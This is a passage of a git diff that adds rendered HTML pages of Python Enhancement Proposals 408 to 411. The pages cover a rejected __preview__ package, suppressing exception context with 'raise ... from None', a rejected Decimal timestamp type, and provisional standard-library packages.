The process of including a new module into the Python standard library is +hindered by the API lock-in and promise of backward compatibility implied by +a module being formally part of Python. This PEP proposes a transitional +state for modules - inclusion in a special __preview__ package for the +duration of a minor release (roughly 18 months) prior to full acceptance into +the standard library. On one hand, this state provides the module with the +benefits of being formally part of the Python distribution. On the other hand, +the core development team explicitly states that no promises are made with +regards to the module’s eventual full inclusion into the standard library, +or to the stability of its API, which may change for the next release.

+
+
+

PEP Rejection

+

Based on his experience with a similar “labs” namespace in Google App Engine, +Guido has rejected this PEP [3] in favour of the simpler alternative of +explicitly marking provisional modules as such in their documentation.

+

If a module is otherwise considered suitable for standard library inclusion, +but some concerns remain regarding maintainability or certain API details, +then the module can be accepted on a provisional basis. While it is considered +an unlikely outcome, such modules may be removed from the standard library +without a deprecation period if the lingering concerns prove well-founded.

+

As part of the same announcement, Guido explicitly accepted Matthew +Barnett’s ‘regex’ module [4] as a provisional addition to the standard +library for Python 3.3 (using the ‘regex’ name, rather than as a drop-in +replacement for the existing ‘re’ module).

+
+
+

Proposal - the __preview__ package

+

Whenever the Python core development team decides that a new module should be +included into the standard library, but isn’t entirely sure about whether the +module’s API is optimal, the module can be placed in a special package named +__preview__ for a single minor release.

+

In the next minor release, the module may either be “graduated” into the +standard library (and occupy its natural place within its namespace, leaving the +__preview__ package), or be rejected and removed entirely from the Python +source tree. If the module ends up graduating into the standard library after +spending a minor release in __preview__, its API may be changed according +to accumulated feedback. The core development team explicitly makes no +guarantees about API stability and backward compatibility of modules in +__preview__.

+

Entry into the __preview__ package marks the start of a transition of the +module into the standard library. It means that the core development team +assumes responsibility of the module, similarly to any other module in the +standard library.

+
+

Which modules should go through __preview__

+

We expect most modules proposed for addition into the Python standard library +to go through a minor release in __preview__. There may, however, be some +exceptions, such as modules that use a pre-defined API (for example lzma, +which generally follows the API of the existing bz2 module), or modules +with an API that has wide acceptance in the Python development community.

+

In any case, modules that are proposed to be added to the standard library, +whether via __preview__ or directly, must fulfill the acceptance conditions +set by PEP 2.

+

It is important to stress that the aim of this proposal is not to make the +process of adding new modules to the standard library more difficult. On the +contrary, it tries to provide a means to add more useful libraries. Modules +which are obvious candidates for entry can be added as before. Modules which +due to uncertainties about the API could be stalled for a long time now have +a means to still be distributed with Python, via an incubation period in the +__preview__ package.

+
+
+

Criteria for “graduation”

+

In principle, most modules in the __preview__ package should eventually +graduate to the stable standard library. Some reasons for not graduating are:

+
    +
  • The module may prove to be unstable or fragile, without sufficient developer +support to maintain it.
  • +
  • A much better alternative module may be found during the preview release
  • +
+

Essentially, the decision will be made by the core developers on a per-case +basis. The point to emphasize here is that a module’s appearance in the +__preview__ package in some release does not guarantee it will continue +being part of Python in the next release.

+
+
+

Example

+

Suppose the example module is a candidate for inclusion in the standard +library, but some Python developers aren’t convinced that it presents the best +API for the problem it intends to solve. The module can then be added to the +__preview__ package in release 3.X, importable via:

+
from __preview__ import example
+
+
+

Assuming the module is then promoted to the standard library proper in +release 3.X+1, it will be moved to a permanent location in the library:

+
import example
+
+
+

And importing it from __preview__ will no longer work.

+
+
+
+

Rationale

+
+

Benefits for the core development team

+

Currently, the core developers are really reluctant to add new interfaces to +the standard library. This is because as soon as they’re published in a +release, API design mistakes get locked in due to backward compatibility +concerns.

+

By gating all major API additions through some kind of a preview mechanism +for a full release, we get one full release cycle of community feedback +before we lock in the APIs with our standard backward compatibility guarantee.

+

We can also start integrating preview modules with the rest of the standard +library early, so long as we make it clear to packagers that the preview +modules should not be considered optional. The only difference between preview +APIs and the rest of the standard library is that preview APIs are explicitly +exempted from the usual backward compatibility guarantees.

+

Essentially, the __preview__ package is intended to lower the risk of +locking in minor API design mistakes for extended periods of time. Currently, +this concern can block new additions, even when the core development team +consensus is that a particular addition is a good idea in principle.

+
+
+

Benefits for end users

+

For future end users, the broadest benefit lies in a better “out-of-the-box” +experience - rather than being told “oh, the standard library tools for task X +are horrible, download this 3rd party library instead”, those superior tools +are more likely to be just be an import away.

+

For environments where developers are required to conduct due diligence on +their upstream dependencies (severely harming the cost-effectiveness of, or +even ruling out entirely, much of the material on PyPI), the key benefit lies +in ensuring that anything in the __preview__ package is clearly under +python-dev’s aegis from at least the following perspectives:

+
    +
  • Licensing: Redistributed by the PSF under a Contributor Licensing Agreement.
  • +
  • Documentation: The documentation of the module is published and organized via +the standard Python documentation tools (i.e. ReST source, output generated +with Sphinx and published on http://docs.python.org).
  • +
  • Testing: The module test suites are run on the python.org buildbot fleet +and results published via http://www.python.org/dev/buildbot.
  • +
  • Issue management: Bugs and feature requests are handled on +http://bugs.python.org
  • +
  • Source control: The master repository for the software is published +on http://hg.python.org.
  • +
+
+
+
+

Candidates for inclusion into __preview__

+

For Python 3.3, there are a number of clear current candidates:

+ +

Other possible future use cases include:

+
    +
  • Improved HTTP modules (e.g. requests)
  • +
  • HTML 5 parsing support (e.g. html5lib)
  • +
  • Improved URL/URI/IRI parsing
  • +
  • A standard image API (PEP 368)
  • +
  • Encapsulation of the import state (PEP 368)
  • +
  • Standard event loop API (PEP 3153)
  • +
  • A binary version of WSGI for Python 3 (e.g. PEP 444)
  • +
  • Generic function support (e.g. simplegeneric)
  • +
+
+
+

Relationship with PEP 407

+

PEP 407 proposes a change to the core Python release cycle to permit interim +releases every 6 months (perhaps limited to standard library updates). If +such a change to the release cycle is made, the following policy for the +__preview__ namespace is suggested:

+
    +
  • For long-term support releases, the __preview__ namespace would always +be empty.
  • +
  • New modules would be accepted into the __preview__ namespace only in +interim releases that immediately follow a long-term support release.
  • +
  • All modules added will either be migrated to their final location in the +standard library or dropped entirely prior to the next long-term support +release.
  • +
+
+
+

Rejected alternatives and variations

+
+

Using __future__

+

Python already has a “forward-looking” namespace in the form of the +__future__ module, so it’s reasonable to ask why that can’t be re-used for +this new purpose.

+

There are two reasons why doing so not appropriate:

+

1. The __future__ module is actually linked to a separate compiler +directives feature that can actually change the way the Python interpreter +compiles a module. We don’t want that for the preview package - we just want +an ordinary Python package.

+

2. The __future__ module comes with an express promise that names will be +maintained in perpetuity, long after the associated features have become the +compiler’s default behaviour. Again, this is precisely the opposite of what is +intended for the preview package - it is almost certain that all names added to +the preview will be removed at some point, most likely due to their being moved +to a permanent home in the standard library, but also potentially due to their +being reverted to third party package status (if community feedback suggests the +proposed addition is irredeemably broken).

+
+
+

Versioning the package

+

One proposed alternative [1] was to add explicit versioning to the +__preview__ package, i.e. __preview34__. We think that it’s better to +simply define that a module being in __preview__ in Python 3.X will either +graduate to the normal standard library namespace in Python 3.X+1 or will +disappear from the Python source tree altogether. Versioning the _preview__ +package complicates the process and does not align well with the main intent of +this proposal.

+
+
+

Using a package name without leading and trailing underscores

+

It was proposed [1] to use a package name like preview or exp, instead +of __preview__. This was rejected in the discussion due to the special +meaning a “dunder” package name (that is, a name with leading and +trailing double-underscores) conveys in Python. Besides, a non-dunder name +would suggest normal standard library API stability guarantees, which is not +the intention of the __preview__ package.

+
+
+

Preserving pickle compatibility

+

A pickled class instance based on a module in __preview__ in release 3.X +won’t be unpickle-able in release 3.X+1, where the module won’t be in +__preview__. Special code may be added to make this work, but this goes +against the intent of this proposal, since it implies backward compatibility. +Therefore, this PEP does not propose to preserve pickle compatibility.

+
+
+
+

Credits

+

Dj Gilcrease initially proposed the idea of having a __preview__ package +in Python [2]. Although his original proposal uses the name +__experimental__, we feel that __preview__ conveys the meaning of this +package in a better way.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0408.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0409/index.html b/pep-0409/index.html new file mode 100644 index 00000000000..795bfb78668 --- /dev/null +++ b/pep-0409/index.html @@ -0,0 +1,296 @@ + + + + + + + + PEP 409 – Suppressing exception context | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 409 – Suppressing exception context

+
+
Author:
+
Ethan Furman <ethan at stoneleaf.us>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
26-Jan-2012
+
Python-Version:
+
3.3
+
Post-History:
+
30-Aug-2002, 01-Feb-2012, 03-Feb-2012
+
Superseded-By:
+
415
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

One of the open issues from PEP 3134 is suppressing context: currently +there is no way to do it. This PEP proposes one.

+
+
+

Rationale

+

There are two basic ways to generate exceptions:

+
    +
  1. Python does it (buggy code, missing resources, ending loops, etc.)
  2. +
  3. manually (with a raise statement)
  4. +
+

When writing libraries, or even just custom classes, it can become +necessary to raise exceptions; moreover it can be useful, even +necessary, to change from one exception to another. To take an example +from my dbf module:

+
try:
+    value = int(value)
+except Exception:
+    raise DbfError(...)
+
+
+

Whatever the original exception was (ValueError, TypeError, or +something else) is irrelevant. The exception from this point on is a +DbfError, and the original exception is of no value. However, if +this exception is printed, we would currently see both.

+
+
+

Alternatives

+

Several possibilities have been put forth:

+
    +
  • raise as NewException()

    Reuses the as keyword; can be confusing since we are not really +reraising the originating exception

    +
  • +
  • raise NewException() from None

    Follows existing syntax of explicitly declaring the originating +exception

    +
  • +
  • exc = NewException(); exc.__context__ = None; raise exc

    Very verbose way of the previous method

    +
  • +
  • raise NewException.no_context(...)

    Make context suppression a class method.

    +
  • +
+

All of the above options will require changes to the core.

+
+
+

Proposal

+

I propose going with the second option:

+
raise NewException from None
+
+
+

It has the advantage of using the existing pattern of explicitly setting +the cause:

+
raise KeyError() from NameError()
+
+
+

but because the cause is None the previous context is not displayed +by the default exception printing routines.

+
+
+

Implementation Discussion

+

Note: after acceptance of this PEP, a cleaner implementation mechanism +was proposed and accepted in PEP 415. Refer to that PEP for more +details on the implementation actually used in Python 3.3.

+

Currently, None is the default for both __context__ and __cause__. +In order to support raise ... from None (which would set __cause__ to +None) we need a different default value for __cause__. Several ideas +were put forth on how to implement this at the language level:

+
    +
  • Overwrite the previous exception information (side-stepping the issue and +leaving __cause__ at None).

    Rejected as this can seriously hinder debugging due to +poor error messages.

    +
  • +
  • Use one of the boolean values in __cause__: False would be the +default value, and would be replaced when from ... was used with the +explicitly chained exception or None.

    Rejected as this encourages the use of two different objects types for +__cause__ with one of them (boolean) not allowed to have the full range +of possible values (True would never be used).

    +
  • +
  • Create a special exception class, __NoException__.

    Rejected as possibly confusing, possibly being mistakenly raised by users, +and not being a truly unique value as None, True, and False are.

    +
  • +
  • Use Ellipsis as the default value (the ... singleton).

    Accepted.

    +

    Ellipses are commonly used in English as place holders when words are +omitted. This works in our favor here as a signal that __cause__ is +omitted, so look in __context__ for more details.

    +

    Ellipsis is not an exception, so cannot be raised.

    +

    There is only one Ellipsis, so no unused values.

    +

    Error information is not thrown away, so custom code can trace the entire +exception chain even if the default code does not.

    +
  • +
+
+
+

Language Details

+

To support raise Exception from None, __context__ will stay as it is, +but __cause__ will start out as Ellipsis and will change to None +when the raise Exception from None method is used.

+ + + + + + + + + + + + + + + + + + + + + +
form__context____cause__
raiseNoneEllipsis
reraiseprevious exceptionEllipsis
reraise from None | ChainedExceptionprevious exceptionNone | explicitly chained exception
+

The default exception printing routine will then:

+
    +
  • If __cause__ is Ellipsis the __context__ (if any) will be +printed.
  • +
  • If __cause__ is None the __context__ will not be printed.
  • +
  • if __cause__ is anything else, __cause__ will be printed.
  • +
+

In both of the latter cases the exception chain will stop being followed.

+

Because the default value for __cause__ is now Ellipsis and raise +Exception from Cause is simply syntactic sugar for:

+
_exc = NewException()
+_exc.__cause__ = Cause()
+raise _exc
+
+
+

Ellipsis, as well as None, is now allowed as a cause:

+
raise Exception from Ellipsis
+
+
+
+
+

Patches

+

There is a patch for CPython implementing this attached to Issue 6210.

+
+
+

References

+

Discussion and refinements in this thread on python-dev.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0409.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0410/index.html b/pep-0410/index.html new file mode 100644 index 00000000000..ef60c2a77a5 --- /dev/null +++ b/pep-0410/index.html @@ -0,0 +1,641 @@ + + + + + + + + PEP 410 – Use decimal.Decimal type for timestamps | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 410 – Use decimal.Decimal type for timestamps

+
+
Author:
+
Victor Stinner <vstinner at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
01-Feb-2012
+
Python-Version:
+
3.3
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

This PEP is rejected. +See https://mail.python.org/pipermail/python-dev/2012-February/116837.html.

+
+
+

Abstract

+

Decimal becomes the official type for high-resolution timestamps to make Python +support new functions using a nanosecond resolution without loss of precision.

+
+
+

Rationale

+

Python 2.3 introduced float timestamps to support sub-second resolutions. +os.stat() uses float timestamps by default since Python 2.5. Python 3.3 +introduced functions supporting nanosecond resolutions:

+
    +
  • os module: futimens(), utimensat()
  • +
  • time module: clock_gettime(), clock_getres(), monotonic(), wallclock()
  • +
+

os.stat() reads nanosecond timestamps but returns timestamps as float.

+

The Python float type uses binary64 format of the IEEE 754 standard. With a +resolution of one nanosecond (10-9), float timestamps lose precision +for values bigger than 224 seconds (194 days: 1970-07-14 for an Epoch +timestamp).

+

Nanosecond resolution is required to set the exact modification time on +filesystems supporting nanosecond timestamps (e.g. ext4, btrfs, NTFS, …). It +helps also to compare the modification time to check if a file is newer than +another file. Use cases: copy the modification time of a file using +shutil.copystat(), create a TAR archive with the tarfile module, manage a +mailbox with the mailbox module, etc.

+

An arbitrary resolution is preferred over a fixed resolution (like nanosecond) +to not have to change the API when a better resolution is required. For +example, the NTP protocol uses fractions of 232 seconds +(approximately 2.3 × 10-10 second), whereas the NTP protocol version +4 uses fractions of 264 seconds (5.4 × 10-20 second).

+
+

Note

+

With a resolution of 1 microsecond (10-6), float timestamps lose +precision for values bigger than 233 seconds (272 years: 2242-03-16 +for an Epoch timestamp). With a resolution of 100 nanoseconds +(10-7, resolution used on Windows), float timestamps lose precision +for values bigger than 229 seconds (17 years: 1987-01-05 for an +Epoch timestamp).

+
+
+
+

Specification

+

Add decimal.Decimal as a new type for timestamps. Decimal supports any +timestamp resolution, support arithmetic operations and is comparable. It is +possible to coerce a Decimal to float, even if the conversion may lose +precision. The clock resolution can also be stored in a Decimal object.

+

Add an optional timestamp argument to:

+
    +
  • os module: fstat(), fstatat(), lstat(), stat() (st_atime, +st_ctime and st_mtime fields of the stat structure), +sched_rr_get_interval(), times(), wait3() and wait4()
  • +
  • resource module: ru_utime and ru_stime fields of getrusage()
  • +
  • signal module: getitimer(), setitimer()
  • +
  • time module: clock(), clock_gettime(), clock_getres(), +monotonic(), time() and wallclock()
  • +
+

The timestamp argument value can be float or Decimal, float is still the +default for backward compatibility. The following functions support Decimal as +input:

+
    +
  • datetime module: date.fromtimestamp(), datetime.fromtimestamp() and +datetime.utcfromtimestamp()
  • +
  • os module: futimes(), futimesat(), lutimes(), utime()
  • +
  • select module: epoll.poll(), kqueue.control(), select()
  • +
  • signal module: setitimer(), sigtimedwait()
  • +
  • time module: ctime(), gmtime(), localtime(), sleep()
  • +
+

The os.stat_float_times() function is deprecated: use an explicit cast using +int() instead.

+
+

Note

+

The decimal module is implemented in Python and is slower than float, but +there is a new C implementation which is almost ready for inclusion in +CPython.

+
+
+
+

Backwards Compatibility

+

The default timestamp type (float) is unchanged, so there is no impact on +backward compatibility nor on performances. The new timestamp type, +decimal.Decimal, is only returned when requested explicitly.

+
+
+

Objection: clocks accuracy

+

Computer clocks and operating systems are inaccurate and fail to provide +nanosecond accuracy in practice. A nanosecond is what it takes to execute a +couple of CPU instructions. Even on a real-time operating system, a +nanosecond-precise measurement is already obsolete when it starts being +processed by the higher-level application. A single cache miss in the CPU will +make the precision worthless.

+
+

Note

+

Linux actually is able to measure time in nanosecond precision, even +though it is not able to keep its clock synchronized to UTC with a +nanosecond accuracy.

+
+
+
+

Alternatives: Timestamp types

+

To support timestamps with an arbitrary or nanosecond resolution, the following +types have been considered:

+
    +
  • decimal.Decimal
  • +
  • number of nanoseconds
  • +
  • 128-bits float
  • +
  • datetime.datetime
  • +
  • datetime.timedelta
  • +
  • tuple of integers
  • +
  • timespec structure
  • +
+

Criteria:

+
    +
  • Doing arithmetic on timestamps must be possible
  • +
  • Timestamps must be comparable
  • +
  • An arbitrary resolution, or at least a resolution of one nanosecond without +losing precision
  • +
  • It should be possible to coerce the new timestamp to float for backward +compatibility
  • +
+

A resolution of one nanosecond is enough to support all current C functions.

+

The best resolution used by operating systems is one nanosecond. In practice, +most clock accuracy is closer to microseconds than nanoseconds. So it sounds +reasonable to use a fixed resolution of one nanosecond.

+
+

Number of nanoseconds (int)

+

A nanosecond resolution is enough for all current C functions and so a +timestamp can simply be a number of nanoseconds, an integer, not a float.

+

The number of nanoseconds format has been rejected because it would require to +add new specialized functions for this format because it not possible to +differentiate a number of nanoseconds and a number of seconds just by checking +the object type.

+
+
+

128-bits float

+

Add a new IEEE 754-2008 quad-precision binary float type. The IEEE 754-2008 +quad precision float has 1 sign bit, 15 bits of exponent and 112 bits of +mantissa. 128-bits float is supported by GCC (4.3), Clang and ICC compilers.

+

Python must be portable and so cannot rely on a type only available on some +platforms. For example, Visual C++ 2008 doesn’t support 128-bits float, whereas +it is used to build the official Windows executables. Another example: GCC 4.3 +does not support __float128 in 32-bit mode on x86 (but GCC 4.4 does).

+

There is also a license issue: GCC uses the MPFR library for 128-bits float, +library distributed under the GNU LGPL license. This license is not compatible +with the Python license.

+
+

Note

+

The x87 floating point unit of Intel CPU supports 80-bit floats. This format +is not supported by the SSE instruction set, which is now preferred over +float, especially on x86_64. Other CPU vendors don’t support 80-bit float.

+
+
+
+

datetime.datetime

+

The datetime.datetime type is the natural choice for a timestamp because it is +clear that this type contains a timestamp, whereas int, float and Decimal are +raw numbers. It is an absolute timestamp and so is well defined. It gives +direct access to the year, month, day, hours, minutes and seconds. It has +methods related to time like methods to format the timestamp as string (e.g. +datetime.datetime.strftime).

+

The major issue is that except os.stat(), time.time() and +time.clock_gettime(time.CLOCK_GETTIME), all time functions have an unspecified +starting point and no timezone information, and so cannot be converted to +datetime.datetime.

+

datetime.datetime has also issues with timezone. For example, a datetime object +without timezone (unaware) and a datetime with a timezone (aware) cannot be +compared. There is also an ordering issues with daylight saving time (DST) in +the duplicate hour of switching from DST to normal time.

+

datetime.datetime has been rejected because it cannot be used for functions +using an unspecified starting point like os.times() or time.clock().

+

For time.time() and time.clock_gettime(time.CLOCK_GETTIME): it is already +possible to get the current time as a datetime.datetime object using:

+
datetime.datetime.now(datetime.timezone.utc)
+
+
+

For os.stat(), it is simple to create a datetime.datetime object from a +decimal.Decimal timestamp in the UTC timezone:

+
datetime.datetime.fromtimestamp(value, datetime.timezone.utc)
+
+
+
+

Note

+

datetime.datetime only supports microsecond resolution, but can be enhanced +to support nanosecond.

+
+
+
+

datetime.timedelta

+

datetime.timedelta is the natural choice for a relative timestamp because it is +clear that this type contains a timestamp, whereas int, float and Decimal are +raw numbers. It can be used with datetime.datetime to get an absolute timestamp +when the starting point is known.

+

datetime.timedelta has been rejected because it cannot be coerced to float and +has a fixed resolution. One new standard timestamp type is enough, Decimal is +preferred over datetime.timedelta. Converting a datetime.timedelta to float +requires an explicit call to the datetime.timedelta.total_seconds() method.

+
+

Note

+

datetime.timedelta only supports microsecond resolution, but can be enhanced +to support nanosecond.

+
+
+
+

Tuple of integers

+

To expose C functions in Python, a tuple of integers is the natural choice to +store a timestamp because the C language uses structures with integers fields +(e.g. timeval and timespec structures). Using only integers avoids the loss of +precision (Python supports integers of arbitrary length). Creating and parsing +a tuple of integers is simple and fast.

+

Depending of the exact format of the tuple, the precision can be arbitrary or +fixed. The precision can be choose as the loss of precision is smaller than +an arbitrary limit like one nanosecond.

+

Different formats have been proposed:

+
    +
  • A: (numerator, denominator)
      +
    • value = numerator / denominator
    • +
    • resolution = 1 / denominator
    • +
    • denominator > 0
    • +
    +
  • +
  • B: (seconds, numerator, denominator)
      +
    • value = seconds + numerator / denominator
    • +
    • resolution = 1 / denominator
    • +
    • 0 <= numerator < denominator
    • +
    • denominator > 0
    • +
    +
  • +
  • C: (intpart, floatpart, base, exponent)
      +
    • value = intpart + floatpart / baseexponent
    • +
    • resolution = 1 / base exponent
    • +
    • 0 <= floatpart < base exponent
    • +
    • base > 0
    • +
    • exponent >= 0
    • +
    +
  • +
  • D: (intpart, floatpart, exponent)
      +
    • value = intpart + floatpart / 10exponent
    • +
    • resolution = 1 / 10 exponent
    • +
    • 0 <= floatpart < 10 exponent
    • +
    • exponent >= 0
    • +
    +
  • +
  • E: (sec, nsec)
      +
    • value = sec + nsec × 10-9
    • +
    • resolution = 10 -9 (nanosecond)
    • +
    • 0 <= nsec < 10 9
    • +
    +
  • +
+

All formats support an arbitrary resolution, except of the format (E).

+

The format (D) may not be able to store the exact value (may loss of precision) +if the clock frequency is arbitrary and cannot be expressed as a power of 10. +The format (C) has a similar issue, but in such case, it is possible to use +base=frequency and exponent=1.

+

The formats (C), (D) and (E) allow optimization for conversion to float if the +base is 2 and to decimal.Decimal if the base is 10.

+

The format (A) is a simple fraction. It supports arbitrary precision, is simple +(only two fields), only requires a simple division to get the floating point +value, and is already used by float.as_integer_ratio().

+

To simplify the implementation (especially the C implementation to avoid +integer overflow), a numerator bigger than the denominator can be accepted. +The tuple may be normalized later.

+

Tuple of integers have been rejected because they don’t support arithmetic +operations.

+
+

Note

+

On Windows, the QueryPerformanceCounter() clock uses the frequency of +the processor which is an arbitrary number and so may not be a power or 2 or +10. The frequency can be read using QueryPerformanceFrequency().

+
+
+
+

timespec structure

+

timespec is the C structure used to store timestamp with a nanosecond +resolution. Python can use a type with the same structure: (seconds, +nanoseconds). For convenience, arithmetic operations on timespec are supported.

+

Example of an incomplete timespec type supporting addition, subtraction and +coercion to float:

+
class timespec(tuple):
+    def __new__(cls, sec, nsec):
+        if not isinstance(sec, int):
+            raise TypeError
+        if not isinstance(nsec, int):
+            raise TypeError
+        asec, nsec = divmod(nsec, 10 ** 9)
+        sec += asec
+        obj = tuple.__new__(cls, (sec, nsec))
+        obj.sec = sec
+        obj.nsec = nsec
+        return obj
+
+    def __float__(self):
+        return self.sec + self.nsec * 1e-9
+
+    def total_nanoseconds(self):
+        return self.sec * 10 ** 9 + self.nsec
+
+    def __add__(self, other):
+        if not isinstance(other, timespec):
+            raise TypeError
+        ns_sum = self.total_nanoseconds() + other.total_nanoseconds()
+        return timespec(*divmod(ns_sum, 10 ** 9))
+
+    def __sub__(self, other):
+        if not isinstance(other, timespec):
+            raise TypeError
+        ns_diff = self.total_nanoseconds() - other.total_nanoseconds()
+        return timespec(*divmod(ns_diff, 10 ** 9))
+
+    def __str__(self):
+        if self.sec < 0 and self.nsec:
+            sec = abs(1 + self.sec)
+            nsec = 10**9 - self.nsec
+            return '-%i.%09u' % (sec, nsec)
+        else:
+            return '%i.%09u' % (self.sec, self.nsec)
+
+    def __repr__(self):
+        return '<timespec(%s, %s)>' % (self.sec, self.nsec)
+
+
+

The timespec type is similar to the format (E) of tuples of integer, except +that it supports arithmetic and coercion to float.

+

The timespec type was rejected because it only supports nanosecond resolution +and requires to implement each arithmetic operation, whereas the Decimal type +is already implemented and well tested.

+
+
+
+

Alternatives: API design

+
+

Add a string argument to specify the return type

+

Add a string argument to function returning timestamps, example: +time.time(format=”datetime”). A string is more extensible than a type: it is +possible to request a format that has no type, like a tuple of integers.

+

This API was rejected because it was necessary to import implicitly modules to +instantiate objects (e.g. import datetime to create datetime.datetime). +Importing a module may raise an exception and may be slow, such behaviour is +unexpected and surprising.

+
+
+

Add a global flag to change the timestamp type

+

A global flag like os.stat_decimal_times(), similar to os.stat_float_times(), +can be added to set globally the timestamp type.

+

A global flag may cause issues with libraries and applications expecting float +instead of Decimal. Decimal is not fully compatible with float. float+Decimal +raises a TypeError for example. The os.stat_float_times() case is different +because an int can be coerced to float and int+float gives float.

+
+
+

Add a protocol to create a timestamp

+

Instead of hard coding how timestamps are created, a new protocol can be added +to create a timestamp from a fraction.

+

For example, time.time(timestamp=type) would call the class method +type.__fromfraction__(numerator, denominator) to create a timestamp object of +the specified type. If the type doesn’t support the protocol, a fallback is +used: type(numerator) / type(denominator).

+

A variant is to use a “converter” callback to create a timestamp. Example +creating a float timestamp:

+
def timestamp_to_float(numerator, denominator):
+    return float(numerator) / float(denominator)
+
+
+

Common converters can be provided by time, datetime and other modules, or maybe +a specific “hires” module. Users can define their own converters.

+

Such protocol has a limitation: the timestamp structure has to be decided once +and cannot be changed later. For example, adding a timezone or the absolute +start of the timestamp would break the API.

+

The protocol proposition was as being excessive given the requirements, but +that the specific syntax proposed (time.time(timestamp=type)) allows this to be +introduced later if compelling use cases are discovered.

+
+

Note

+

Other formats may be used instead of a fraction: see the tuple of integers +section for example.

+
+
+
+

Add new fields to os.stat

+

To get the creation, modification and access time of a file with a nanosecond +resolution, three fields can be added to os.stat() structure.

+

The new fields can be timestamps with nanosecond resolution (e.g. Decimal) or +the nanosecond part of each timestamp (int).

+

If the new fields are timestamps with nanosecond resolution, populating the +extra fields would be time-consuming. Any call to os.stat() would be slower, +even if os.stat() is only called to check if a file exists. A parameter can be +added to os.stat() to make these fields optional, the structure would have a +variable number of fields.

+

If the new fields only contain the fractional part (nanoseconds), os.stat() +would be efficient. These fields would always be present and so set to zero if +the operating system does not support sub-second resolution. Splitting a +timestamp in two parts, seconds and nanoseconds, is similar to the timespec +type and tuple of integers, and so have the same drawbacks.

+

Adding new fields to the os.stat() structure does not solve the nanosecond +issue in other modules (e.g. the time module).

+
+
+

Add a boolean argument

+

Because we only need one new type (Decimal), a simple boolean flag can be +added. Example: time.time(decimal=True) or time.time(hires=True).

+

Such flag would require to do a hidden import which is considered as a bad +practice.

+

The boolean argument API was rejected because it is not “pythonic”. Changing +the return type with a parameter value is preferred over a boolean parameter (a +flag).

+
+
+

Add new functions

+

Add new functions for each type, examples:

+
    +
  • time.clock_decimal()
  • +
  • time.time_decimal()
  • +
  • os.stat_decimal()
  • +
  • os.stat_timespec()
  • +
  • etc.
  • +
+

Adding a new function for each function creating timestamps duplicate a lot of +code and would be a pain to maintain.

+
+
+

Add a new hires module

+

Add a new module called “hires” with the same API than the time module, except +that it would return timestamp with high resolution, e.g. decimal.Decimal. +Adding a new module avoids to link low-level modules like time or os to the +decimal module.

+

This idea was rejected because it requires to duplicate most of the code of the +time module, would be a pain to maintain, and timestamps are used modules other +than the time module. Examples: signal.sigtimedwait(), select.select(), +resource.getrusage(), os.stat(), etc. Duplicate the code of each module is not +acceptable.

+
+
+ + +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0410.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0411/index.html b/pep-0411/index.html new file mode 100644 index 00000000000..5520831083f --- /dev/null +++ b/pep-0411/index.html @@ -0,0 +1,331 @@ + + + + + + + + PEP 411 – Provisional packages in the Python standard library | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 411 – Provisional packages in the Python standard library

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>, +Eli Bendersky <eliben at gmail.com>
+
Status:
+
Superseded
+
Type:
+
Informational
+
Created:
+
10-Feb-2012
+
Python-Version:
+
3.3
+
Post-History:
+
10-Feb-2012, 24-Mar-2012
+
+
+
+
Table of Contents +
+
+

Note

+

This PEP has been marked as Superseded. A decade after this PEP +was written, experience has shown this is a rarely used feature in +managing the standard library. It has also not helped prevent +people from relying too heavily on provisional modules, such that +changes can still cause significant breakage in the community.

+
+
+

Abstract

+

The process of including a new package into the Python standard library is +hindered by the API lock-in and promise of backward compatibility implied by +a package being formally part of Python. This PEP describes a methodology +for marking a standard library package “provisional” for the period of a single +feature release. A provisional package may have its API modified prior to +“graduating” into a “stable” state. On one hand, this state provides the +package with the benefits of being formally part of the Python distribution. +On the other hand, the core development team explicitly states that no promises +are made with regards to the stability of the package’s API, which may +change for the next release. While it is considered an unlikely outcome, +such packages may even be removed from the standard library without a +deprecation period if the concerns regarding their API or maintenance prove +well-founded.

+
+
+

Proposal - a documented provisional state

+

Whenever the Python core development team decides that a new package should be +included into the standard library, but isn’t entirely sure about whether the +package’s API is optimal, the package can be included and marked as +“provisional”.

+

In the next feature release, the package may either be “graduated” into a normal +“stable” state in the standard library, remain in provisional state, or be +rejected and removed entirely from the Python source tree. If the package ends +up graduating into the stable state after being provisional, its API may +be changed according to accumulated feedback. The core development team +explicitly makes no guarantees about API stability and backward compatibility +of provisional packages.

+
+

Marking a package provisional

+

A package will be marked provisional by a notice in its documentation page and +its docstring. The following paragraph will be added as a note at the top of +the documentation page:

+
+
The <X> package has been included in the standard library on a +provisional basis. Backwards incompatible changes (up to and including +removal of the package) may occur if deemed necessary by the core +developers.
+

The phrase “provisional basis” will then be a link to the glossary term +“provisional package”, defined as:

+
+
A provisional package is one which has been deliberately excluded from the +standard library’s backwards compatibility guarantees. While major +changes to such packages are not expected, as long as they are marked +provisional, backwards incompatible changes (up to and including removal of +the package) may occur if deemed necessary by core developers. Such changes +will not be made gratuitously – they will occur only if serious flaws are +uncovered that were missed prior to the inclusion of the package.

